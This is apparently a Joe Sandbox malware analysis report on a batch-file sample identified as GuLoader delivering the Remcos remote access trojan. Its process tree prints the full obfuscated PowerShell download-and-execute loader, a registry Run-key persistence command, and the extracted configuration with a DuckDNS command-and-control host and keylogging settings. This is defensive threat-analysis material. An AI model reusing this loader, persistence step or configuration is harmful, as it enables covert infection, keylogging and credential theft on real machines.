Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZW_PCCE-010023024001.bat

Overview

General Information

Sample name:ZW_PCCE-010023024001.bat
Analysis ID:1540333
MD5:38b51fe8789aee6c37ac4fa092eefa0f
SHA1:8b5003d1917a07cd8f66cea66ad0add47130fc5b
SHA256:36a9a24404963678edab15248ca95a4065bdc6a84e32fcb7a2387c3198641374
Tags:batuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7252 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7344 cmdline: powershell.exe -windowstyle hidden " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg aanKendg HeteM sqrsmaleSeedsFosi ');$Grasshopper=viruserne 'Stee$,ommfTrotoNon rg nbwKvalaScotrRdhudUsheeSlamr.outs Une.D sbDS,oroGenfwC nfnAntil,fteoCoc.a SttdCow FBesti Baal rugeK.ok(Drug$AntoNPangeBehauIndukVigt, yk$BedvUUdr nP aspPredrPassoEutanTopfoR.abuEnvynEtagcMe oiLog.nUmodgL,ma)Bard ';$Unpronouncing=$Superdural;Vvningens (viruserne 'Maju$ UhaGMultLJugaoP.enb BhmARedeLschl:monafForbOStorLAndeEPr lnS,mmdTadpETri sFa.b=Util( MinTpur.eMarkspresTPinl-Kr nPHaveaKurvtGlasHCebu Mult$SonnUNonvNSam,PP rsrKu doAarsN ,doO UnfUPapanRaggcImplIComiNErklgMand)Undi ');while (!$Folendes) {Vvningens (viruserne 'S.ne$JerngFilmlOpgaoEjsab joka Lnnl Unh: SpuPMa,erKliteLadipRansa StyrCamoeIn tdGent=Porp$Trafttr.kr ForuSubsetetr ') ;Vvningens $Grasshopper;Vvningens (viruserne ' amfsSquiTO.eraCincRIffitBo g- EliS EgnlInv,EspalEabscpLers Ep.s4Arg. ');Vvningens (viruserne 'bygg$ S vgContLE suOVedfBSc lA icol Leg:JoblFSolboLoyaLForbE L knTrandGyroEUnsesSmed=Ni.r( ,rgtG steChrosInteTHerb- AbsP Tobakartt egeh nmo Arc$Shawu,ejlnArbepInv RAcetoTrevnU saO ur,UfolkNFormCSunli.pronHypeGHype) Haa ') ;Vvningens (viruserne 'Over$pipegSemilGrimOP,eubGingABoutLFors:AyahCC.plOM.ssmUntreUnsclVe dITeloEInjusa meT Pyg=Barf$SkycGLovblorpiogigaB Dama MunLPenn:frembE ideGe tmVninE OpseBrygT Uns+ Skr+Und %Unsu$cultMf jloUnb.STorpa imeiSpanKActuK SecE .lirAnemNSkruEEmer.Te rCDyreO indu AksNMicrT en ') ;$Neuk=$mosaikkerne[$Comeliest];}$Forvrrelser=319177;$synclastic=31223;Vvningens (viruserne 'Sk l$ ootgExcyl omsoS ilbSupeaPertL.ern:LimpKPr.doTrouMNrinMPolyEScopNHeretChapeSe,vRDri EKe,uNW.ipdDub E F rSSvmm Dksl= Kla epidgUncaEEx,itKrse- Kupc ArcOD sinUs,utMurbEOmhunK ontSko. Forh$S igUBillNTes,PHomerBekoo Swan SulOIwarU,entNCounCC vii Komnh stg Bkk ');Vvningens (viruserne ' en$ MalgTreflSkaloSh rbVanda ovel jou:Mrk fStila SvilEncld.elseColor elaeFan b ibsGru t Perr nona rnrplebbpForgeMavesRawl Pro,= ubr Sho[ConvS,arbyInexsCompt InieN.rvm ir.GoneC L.mo ArbnfarmvShodeAnabrAsket Fac]Ra k: iff:TetrFDaasrWateoMes.mPlotBDefia MagsOvereCele6Gree4St,rSGun tT.rnrForfiNot nMantgPal (Brev$TachK G.eoPi pmInh m rabeOptin sv t.eboe RygrGallemarinLinjdVrikeHalvsrdde) nds ');Vvningens (viruserne 'Unde$ ownG urhL ForoAl,sbAutoaLyspLlakf: SetpSagsaSt uTAstme repNTovnTBorieC.ilR StuI.eerNCo ogSkr,el teR friNS alEshudSdeto Dato=Stic Rape[ omfsUnmaYKlimSDiopT.ffieFla.MDem .shoptLommeDobbxSyndtSizz. utaeSmrenIndiC FarObostDPibeI Prenchapgdyre]k mm: nin: aliaCladS TimCLeptICaprIF rb.RiddGFlorE,lketFredSIntetMat.RTemiIC,rynKlamGinve(Non,$ UnrfCoonAPostLSepaDUnpreSygdRMumme CarbEnqus svat Smar JenAKal PCyclpklunE rots Oks)Broa ');Vvningens (viruserne ' S l$Be.oGW.teLfsteoK,tyBFrieaMu,eLGr m: KrueS btU Bkbr FreyBeerA BrdlTa tePaaka,eboN N,u=s.aa$Corop BalaNidstSavle ,ejnMiniTCr nESalvROsmoipelonLoregMotoeTopur H,snPosteVa uS U o.Pasts,eopuCa ib AldSforhT O eRGranI jednSub,gBekn( und$LaboFOncioHonortrilVrespRj aprSundeFil.LCymbs UndENit Rlag ,Ditl$Afd sVedky BluNVe nCCon l innA CedSDe aTS,uliTilscP.zz) Is ');Vvningens $Euryalean;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7580 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Chrimsel aflsser purificant #>;$Hydrosphere='Northumbria';<#Opkaldelses Torsionernes Certifiability Iconomachal Neutronerne Abv Afgiftningers #>;$Fileresdeologikritikkernes=$Lovregel+$host.UI; function viruserne($Tentaculite){If ($Fileresdeologikritikkernes) {$Gasapparats++;}$Fileresmitators=$Troldunges+$Tentaculite.'Length'-$Gasapparats; for( $Fileres=4;$Fileres -lt $Fileresmitators;$Fileres+=5){$Sempres=$Fileres;$Haccucal+=$Tentaculite[$Fileres];$Threadmaking='Bagstoppere';}$Haccucal;}function Vvningens($Smadrekassens){ & ($Hypogeic122) ($Smadrekassens);}$Taagngeres=viruserne 'R suMChlooMaalz Ko iCoerlSylflHyb.aDyrt/Delg ';$Taagngeres+=viruserne 'Comp5helb.Bai 0moth Rege(MaiiWBe aiTaranTam,d SuroTaanwFisksD.bk esiNSandTEunu Cayu1T nt0Rets.Sp j0Ster; Kha RetWBergi npan Sta6Peac4Parb; Woo VegxReto6Syne4 F,i; Nov MassrBondvStud:Yug,1Mu.v3Inge1A ur. pap0 Pil)Gimb Usk GCirce MilcEskok Svao C a/Kons2 Ell0Mure1Domi0 Kar0Edde1Tamm0 ato1Smut Re,mFG aciSte.rForveSalofTankoSmrexHuck/Miso1Dena3Gird1Bi d. Mid0Data ';$Uncorner=viruserne ',edgUVilds xtrE defROmdm-FolkaDrawGM thePrepnErnrT Mi. ';$Neuk=viruserne 'DelrhRacetHk rtRo kpTatasf.du:Over/Thra/StoreEqu tHavfhteisyK imsLasi. ,atrFistoViri/SmaaNthymo elinathyaUn fdReasdAtomiJibicPikatBureiStepnRg agO ga. DumqCounx EnedScri ';$Dacryd=viruserne 'Felt>Hjer ';$Hypogeic122=viruserne 'TrafIVinoe trixGono ';$Gar='Nondenunciatory';$Fejlfunktioner='\Trykimprgneredes.Ene';Vvningens (viruserne 'Sp.y$Ho.lG stoLAfv OkarlB EkaaNondLLent: Ud.Spe iU SamP,skve TerrDaemdBankUSuperGestA tirlValg=Lank$ IndE KatnBrobvLact: SenaInfoPTerrpJongD S saF rmt RetA.obb+ Lat$Ps,uFDesqEHowlJRis LArchFUnfeu jlkNulykkConsT E,iisi.toKerbNMusee Ha RWave ');Vvningens (viruserne 'Alte$W dlg KonlTra OTyvsB T aA laLExec:UddaMUna oBestST ilAUnasI MorKM.urkI,ideUnexr BarNB.rgePapi= .an$DopinSvr.eTrykuRebrKKatr. agiSFagsp Bdel dagi vi t.uss(Uds $F nzDS apasvanCUndeRK drY PredLege)Shin ');Vvningens (viruserne 'D.fi[,rayn adkEdragT Ido.Tri S DupETredRA skvSul,iSknlcIndiE UndP Re O rndiGuatnnondT S emFarvaStranP egAAuxoGUdlyEUdg,rClo ]Para:Bu,a:InlasUncaeConnCF,rkURallrO grIWithtCharySeraPRadirNarkODiplTO,thOKontcLangoPygalland T,rp=skin .ver[banknKoe,ePoi T,ent.UnsuSErytE tancAgarUForpr Va,IP ivT BroyFrgepBrndR IncotravtSurmOBwancJasiOUnquL DestVapoYphytP lateSk f]Hand:Velv: S,dt ,teL VidSStam1Duct2Skr ');$Neuk=$mosaikkerne[0];$Srlovgivningerne=(viruserne 'Pek.$U paGStenLA trOCir.BSkafa TheLSk,l: To f llOTopar UnoWUnscaSinoRProtdSperEGut RE ols Unh=gavnnF leEOxydwMugg-backOUbetBAm,njHorse ,udC FortW,gl RefusThriyEnkeSRemutPeroeEpalMT,al. eprNThicePlaytAr e. ypnWAcylESl,gbSp rCVe,sLMoorIFinpeGendn I etAnem ');Vvningens ($Srlovgivningerne);Vvningens (viruserne 'st n$UfrefGeheoCentr i gw,rbiaManurgen dGlaneMellrBosss.oru.Tl eHAlkoeTilsaPostdKal eL,str Forss.ri[wago$Mul.UChain CodcSyklo Satr curnN.nleLdrer .na]Or h=Meta$D,kaTAcc a Abea C sg aanKendg HeteM sqrsmaleSeedsFosi ');$Grasshopper=viruserne 'Stee$,ommfTrotoNon rg nbwKvalaScotrRdhudUsheeSlamr.outs Une.D sbDS,oroGenfwC nfnAntil,fteoCoc.a SttdCow FBesti Baal rugeK.ok(Drug$AntoNPangeBehauIndukVigt, yk$BedvUUdr nP aspPredrPassoEutanTopfoR.abuEnvynEtagcMe oiLog.nUmodgL,ma)Bard ';$Unpronouncing=$Superdural;Vvningens (viruserne 'Maju$ UhaGMultLJugaoP.enb BhmARedeLschl:monafForbOStorLAndeEPr lnS,mmdTadpETri sFa.b=Util( MinTpur.eMarkspresTPinl-Kr nPHaveaKurvtGlasHCebu Mult$SonnUNonvNSam,PP rsrKu doAarsN ,doO UnfUPapanRaggcImplIComiNErklgMand)Undi ');while (!$Folendes) {Vvningens (viruserne 'S.ne$JerngFilmlOpgaoEjsab joka Lnnl Unh: SpuPMa,erKliteLadipRansa StyrCamoeIn tdGent=Porp$Trafttr.kr ForuSubsetetr ') ;Vvningens $Grasshopper;Vvningens (viruserne ' amfsSquiTO.eraCincRIffitBo g- EliS EgnlInv,EspalEabscpLers Ep.s4Arg. ');Vvningens (viruserne 'bygg$ S vgContLE suOVedfBSc lA icol Leg:JoblFSolboLoyaLForbE L knTrandGyroEUnsesSmed=Ni.r( ,rgtG steChrosInteTHerb- AbsP Tobakartt egeh nmo Arc$Shawu,ejlnArbepInv RAcetoTrevnU saO ur,UfolkNFormCSunli.pronHypeGHype) Haa ') ;Vvningens (viruserne 'Over$pipegSemilGrimOP,eubGingABoutLFors:AyahCC.plOM.ssmUntreUnsclVe dITeloEInjusa meT Pyg=Barf$SkycGLovblorpiogigaB Dama MunLPenn:frembE ideGe tmVninE OpseBrygT Uns+ Skr+Und %Unsu$cultMf jloUnb.STorpa imeiSpanKActuK SecE .lirAnemNSkruEEmer.Te rCDyreO indu AksNMicrT en ') ;$Neuk=$mosaikkerne[$Comeliest];}$Forvrrelser=319177;$synclastic=31223;Vvningens (viruserne 'Sk l$ ootgExcyl omsoS ilbSupeaPertL.ern:LimpKPr.doTrouMNrinMPolyEScopNHeretChapeSe,vRDri EKe,uNW.ipdDub E F rSSvmm Dksl= Kla epidgUncaEEx,itKrse- Kupc ArcOD sinUs,utMurbEOmhunK ontSko. Forh$S igUBillNTes,PHomerBekoo Swan SulOIwarU,entNCounCC vii Komnh stg Bkk ');Vvningens (viruserne ' en$ MalgTreflSkaloSh rbVanda ovel jou:Mrk fStila SvilEncld.elseColor elaeFan b ibsGru t Perr nona rnrplebbpForgeMavesRawl Pro,= ubr Sho[ConvS,arbyInexsCompt InieN.rvm ir.GoneC L.mo ArbnfarmvShodeAnabrAsket Fac]Ra k: iff:TetrFDaasrWateoMes.mPlotBDefia MagsOvereCele6Gree4St,rSGun tT.rnrForfiNot nMantgPal (Brev$TachK G.eoPi pmInh m rabeOptin sv t.eboe RygrGallemarinLinjdVrikeHalvsrdde) nds ');Vvningens (viruserne 'Unde$ ownG urhL ForoAl,sbAutoaLyspLlakf: SetpSagsaSt uTAstme repNTovnTBorieC.ilR StuI.eerNCo ogSkr,el teR friNS alEshudSdeto Dato=Stic Rape[ omfsUnmaYKlimSDiopT.ffieFla.MDem .shoptLommeDobbxSyndtSizz. utaeSmrenIndiC FarObostDPibeI Prenchapgdyre]k mm: nin: aliaCladS TimCLeptICaprIF rb.RiddGFlorE,lketFredSIntetMat.RTemiIC,rynKlamGinve(Non,$ UnrfCoonAPostLSepaDUnpreSygdRMumme CarbEnqus svat Smar JenAKal PCyclpklunE rots Oks)Broa ');Vvningens (viruserne ' S l$Be.oGW.teLfsteoK,tyBFrieaMu,eLGr m: KrueS btU Bkbr FreyBeerA BrdlTa tePaaka,eboN N,u=s.aa$Corop BalaNidstSavle ,ejnMiniTCr nESalvROsmoipelonLoregMotoeTopur H,snPosteVa uS U o.Pasts,eopuCa ib AldSforhT O eRGranI jednSub,gBekn( und$LaboFOncioHonortrilVrespRj aprSundeFil.LCymbs UndENit Rlag ,Ditl$Afd sVedky BluNVe nCCon l innA CedSDe aTS,uliTilscP.zz) Is ');Vvningens $Euryalean;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7800 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7896 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7940 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 2960 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1280 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2800 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • wscript.exe (PID: 7560 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["rj0987654321.duckdns.org:53848:1"], "Assigned name": "r", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "Windeep.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I42HQ2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppDir", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000008.00000003.2715933734.0000000008A44000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 21 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_7344.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_7580.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc38a:$b2: ::FromBase64String(
                • 0xb407:$s1: -join
                • 0x4bb3:$s4: +=
                • 0x4c75:$s4: +=
                • 0x8e9c:$s4: +=
                • 0xafb9:$s4: +=
                • 0xb2a3:$s4: +=
                • 0xb3e9:$s4: +=
                • 0x15745:$s4: +=
                • 0x157c5:$s4: +=
                • 0x1588b:$s4: +=
                • 0x1590b:$s4: +=
                • 0x15ae1:$s4: +=
                • 0x15b65:$s4: +=
                • 0xbc23:$e4: Get-WmiObject
                • 0xbe12:$e4: Get-Process
                • 0xbe6a:$e4: Start-Process
                • 0x163c9:$e4: Get-Process

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7800, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , ProcessId: 7560, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7800, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , ProcessId: 7560, ProcessName: wscript.exe
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7800, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs" , ProcessId: 7560, ProcessName: wscript.exe
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7940, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7896, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 